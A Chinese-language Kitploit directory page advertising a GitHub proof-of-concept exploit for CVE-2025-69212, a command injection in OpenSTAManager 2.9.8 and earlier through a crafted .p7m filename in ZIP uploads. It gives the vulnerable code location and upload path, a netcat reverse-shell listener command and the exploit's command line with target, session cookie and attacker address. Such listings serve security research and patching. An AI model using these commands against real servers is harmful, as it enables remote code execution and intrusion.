Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2025-69212-PoC — 针对CVE-2025-69212的概念验证漏洞利用:OpenSTAManager <= 2.9.8 中通过恶意.p7m文件名在ZIP上传时实现OS命令注入,进而实现远程代码执行。 | Kitploit
工具/GitHubGitHub/tohib09/cve-2025-69212-poc
漏洞分析漏洞利用Web应用程序漏洞利用渗透测试命令与控制
GitHubtohib09/cve-2025-69212-poc

CVE-2025-69212-PoC

针对CVE-2025-69212的概念验证漏洞利用:OpenSTAManager <= 2.9.8 中通过恶意.p7m文件名在ZIP上传时实现OS命令注入,进而实现远程代码执行。

查看仓库
42个月前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

CVE-2025-69212 — OpenSTAManager P7M 命令注入 PoC

OpenSTAManager <= 2.9.8 — 通过 ZIP 上传中的恶意 .p7m 文件名实现操作系统命令注入

文件: src/Util/XML.php:100 — 未净化的 $file 位于 exec() 中

向量: /plugins/importFE_ZIP/actions.php → ZIP → .p7m 文件名 → exec("openssl smime ... -in \"$file\" ...")

使用方法

root@kitploit:~
# Listener
nc -lvnp 4444

# Exploit
python3 CVE-2025-69212.py http://target.htb YOUR_PHPSESSID 10.10.14.X 4444

参考链接

  • https://github.com/advisories/GHSA-25fp-8w8p-mx36
  • https://nvd.nist.gov/vuln/detail/CVE-2025-69212

CVE-2025-69212-PoC

下载工具